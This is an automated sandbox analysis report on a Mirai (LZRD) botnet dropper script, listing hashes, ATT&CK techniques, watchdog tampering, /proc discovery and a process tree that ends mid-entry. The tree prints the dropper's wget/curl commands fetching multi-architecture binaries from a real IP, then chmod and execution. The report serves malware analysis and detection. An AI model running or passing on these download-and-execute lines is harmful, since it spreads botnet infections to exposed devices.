mirai | 4f1c0d593b90f06aadb41e43d72dabe8a57d52df99bdfbf67db6e2e3aecdfdcf

Analysis

max time kernel
148s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21/01/2025, 21:07 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

d91a756fa0b51d26ca560e689c65f02a
SHA1

dca13e8c0ff369c8850b09e06eb9aecde38da7ad
SHA256

4f1c0d593b90f06aadb41e43d72dabe8a57d52df99bdfbf67db6e2e3aecdfdcf
SHA512

5386d2bb591a257c64e71563c16435bf9f606d813031417233700d22e0b31bad1f33f73ae7ef581033c3c1633ca9b897d162a64019fc415ba6d9505a7b7f8533

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1502	chmod
1534	chmod
1552	chmod
1630	chmod
1638	chmod
1494	chmod
1518	chmod
1526	chmod
1592	chmod
1606	chmod
1622	chmod
1573	chmod
1614	chmod
1542	chmod
1646	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/oqweoqeqq	1495	oqweoqeqq
/tmp/oqweoqeqq	1503	oqweoqeqq
/tmp/oqweoqeqq	1519	oqweoqeqq
/tmp/oqweoqeqq	1527	oqweoqeqq
/tmp/oqweoqeqq	1535	oqweoqeqq
/tmp/oqweoqeqq	1543	oqweoqeqq
/tmp/oqweoqeqq	1553	oqweoqeqq
/tmp/oqweoqeqq	1574	oqweoqeqq
/tmp/oqweoqeqq	1593	oqweoqeqq
/tmp/oqweoqeqq	1607	oqweoqeqq
/tmp/oqweoqeqq	1615	oqweoqeqq
/tmp/oqweoqeqq	1623	oqweoqeqq
/tmp/oqweoqeqq	1631	oqweoqeqq
/tmp/oqweoqeqq	1639	oqweoqeqq
/tmp/oqweoqeqq	1647	oqweoqeqq

Modifies Watchdog functionality 1 TTPs 30 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 30 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1037/cmdline	oqweoqeqq
File opened for reading	/proc/586/cmdline	oqweoqeqq
File opened for reading	/proc/1179/cmdline	oqweoqeqq
File opened for reading	/proc/515/cmdline	oqweoqeqq
File opened for reading	/proc/1634/cmdline	oqweoqeqq
File opened for reading	/proc/1610/cmdline	oqweoqeqq
File opened for reading	/proc/1275/cmdline	oqweoqeqq
File opened for reading	/proc/1650/cmdline	oqweoqeqq
File opened for reading	/proc/659/cmdline	oqweoqeqq
File opened for reading	/proc/1522/cmdline	oqweoqeqq
File opened for reading	/proc/958/cmdline	oqweoqeqq
File opened for reading	/proc/588/cmdline	oqweoqeqq
File opened for reading	/proc/1294/cmdline	oqweoqeqq
File opened for reading	/proc/407/cmdline	oqweoqeqq
File opened for reading	/proc/1496/cmdline	oqweoqeqq
File opened for reading	/proc/1477/cmdline	oqweoqeqq
File opened for reading	/proc/1522/cmdline	oqweoqeqq
File opened for reading	/proc/432/cmdline	oqweoqeqq
File opened for reading	/proc/444/cmdline	oqweoqeqq
File opened for reading	/proc/1339/cmdline	oqweoqeqq
File opened for reading	/proc/1031/cmdline	oqweoqeqq
File opened for reading	/proc/1255/cmdline	oqweoqeqq
File opened for reading	/proc/704/cmdline	oqweoqeqq
File opened for reading	/proc/1536/cmdline	oqweoqeqq
File opened for reading	/proc/1150/cmdline	oqweoqeqq
File opened for reading	/proc/1626/cmdline	oqweoqeqq
File opened for reading	/proc/1240/cmdline	oqweoqeqq
File opened for reading	/proc/406/cmdline	oqweoqeqq
File opened for reading	/proc/451/cmdline	oqweoqeqq
File opened for reading	/proc/1097/cmdline	oqweoqeqq
File opened for reading	/proc/1575/cmdline	oqweoqeqq
File opened for reading	/proc/1648/cmdline	oqweoqeqq
File opened for reading	/proc/1544/cmdline	oqweoqeqq
File opened for reading	/proc/438/cmdline	oqweoqeqq
File opened for reading	/proc/506/cmdline	oqweoqeqq
File opened for reading	/proc/1179/cmdline	oqweoqeqq
File opened for reading	/proc/588/cmdline	oqweoqeqq
File opened for reading	/proc/648/cmdline	oqweoqeqq
File opened for reading	/proc/1276/cmdline	oqweoqeqq
File opened for reading	/proc/1650/cmdline	oqweoqeqq
File opened for reading	/proc/436/cmdline	oqweoqeqq
File opened for reading	/proc/1522/cmdline	oqweoqeqq
File opened for reading	/proc/471/cmdline	oqweoqeqq
File opened for reading	/proc/415/cmdline	oqweoqeqq
File opened for reading	/proc/1137/cmdline	oqweoqeqq
File opened for reading	/proc/1473/cmdline	oqweoqeqq
File opened for reading	/proc/1554/cmdline	oqweoqeqq
File opened for reading	/proc/1142/cmdline	oqweoqeqq
File opened for reading	/proc/1056/cmdline	oqweoqeqq
File opened for reading	/proc/1504/cmdline	oqweoqeqq
File opened for reading	/proc/434/cmdline	oqweoqeqq
File opened for reading	/proc/1054/cmdline	oqweoqeqq
File opened for reading	/proc/1544/cmdline	oqweoqeqq
File opened for reading	/proc/1312/cmdline	oqweoqeqq
File opened for reading	/proc/1642/cmdline	oqweoqeqq
File opened for reading	/proc/1115/cmdline	oqweoqeqq
File opened for reading	/proc/1498/cmdline	oqweoqeqq
File opened for reading	/proc/1608/cmdline	oqweoqeqq
File opened for reading	/proc/1132/cmdline	oqweoqeqq
File opened for reading	/proc/1294/cmdline	oqweoqeqq
File opened for reading	/proc/1056/cmdline	oqweoqeqq
File opened for reading	/proc/1594/cmdline	oqweoqeqq
File opened for reading	/proc/1123/cmdline	oqweoqeqq
File opened for reading	/proc/1174/cmdline	oqweoqeqq

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1499	wget
1500	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/uqwodquojqoqdo.x86	wget
File opened for modification	/tmp/uqwodquojqoqdo.arc	curl
File opened for modification	/tmp/uqwodquojqoqdo.spc	curl
File opened for modification	/tmp/uqwodquojqoqdo.m68k	wget
File opened for modification	/tmp/uqwodquojqoqdo.sh4	wget
File opened for modification	/tmp/uqwodquojqoqdo.spc	wget
File opened for modification	/tmp/uqwodquojqoqdo.m68k	curl
File opened for modification	/tmp/uqwodquojqoqdo.sh4	curl
File opened for modification	/tmp/uqwodquojqoqdo.mips	curl
File opened for modification	/tmp/uqwodquojqoqdo.i686	curl
File opened for modification	/tmp/uqwodquojqoqdo.mpsl	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm	curl
File opened for modification	/tmp/uqwodquojqoqdo.arm6	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm6	curl
File opened for modification	/tmp/uqwodquojqoqdo.x86	curl
File opened for modification	/tmp/uqwodquojqoqdo.arc	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm5	curl
File opened for modification	/tmp/uqwodquojqoqdo.ppc	curl
File opened for modification	/tmp/uqwodquojqoqdo.mips	wget
File opened for modification	/tmp/uqwodquojqoqdo.x86_64	curl
File opened for modification	/tmp/uqwodquojqoqdo.mpsl	curl
File opened for modification	/tmp/uqwodquojqoqdo.arm	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm7	wget
File opened for modification	/tmp/oqweoqeqq	ohshit.sh
File opened for modification	/tmp/uqwodquojqoqdo.i468	curl
File opened for modification	/tmp/uqwodquojqoqdo.arm5	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm7	curl
File opened for modification	/tmp/uqwodquojqoqdo.ppc	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:1487
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86
  2⤵
  - Writes file to tmp directory
  PID:1488
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86
  2⤵
  - Writes file to tmp directory
  PID:1492
- /bin/cat
  cat uqwodquojqoqdo.x86
  2⤵
  PID:1493
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1494
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1495
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1499
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1500
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1502
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1503
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc
  2⤵
  - Writes file to tmp directory
  PID:1507
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1519
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468
  2⤵
  PID:1523
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1527
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686
  2⤵
  PID:1531
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1535
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64
  2⤵
  PID:1539
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1543
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1547
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1552
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1553
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm
  2⤵
  - Writes file to tmp directory
  PID:1557
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-J7Cnpv systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1574
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5
  2⤵
  - Writes file to tmp directory
  PID:1578
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5
  2⤵
  - Writes file to tmp directory
  PID:1584
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1593
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6
  2⤵
  - Writes file to tmp directory
  PID:1597
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6
  2⤵
  - Writes file to tmp directory
  PID:1604
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1606
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1607
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7
  2⤵
  - Writes file to tmp directory
  PID:1611
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7
  2⤵
  - Writes file to tmp directory
  PID:1612
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1614
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1615
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc
  2⤵
  - Writes file to tmp directory
  PID:1619
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1623
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc
  2⤵
  - Writes file to tmp directory
  PID:1627
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc
  2⤵
  - Writes file to tmp directory
  PID:1628
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1630
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1631
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k
  2⤵
  - Writes file to tmp directory
  PID:1635
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k
  2⤵
  - Writes file to tmp directory
  PID:1636
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.m68k uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1638
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1639
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4
  2⤵
  - Writes file to tmp directory
  PID:1643
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4
  2⤵
  - Writes file to tmp directory
  PID:1644
- /bin/chmod
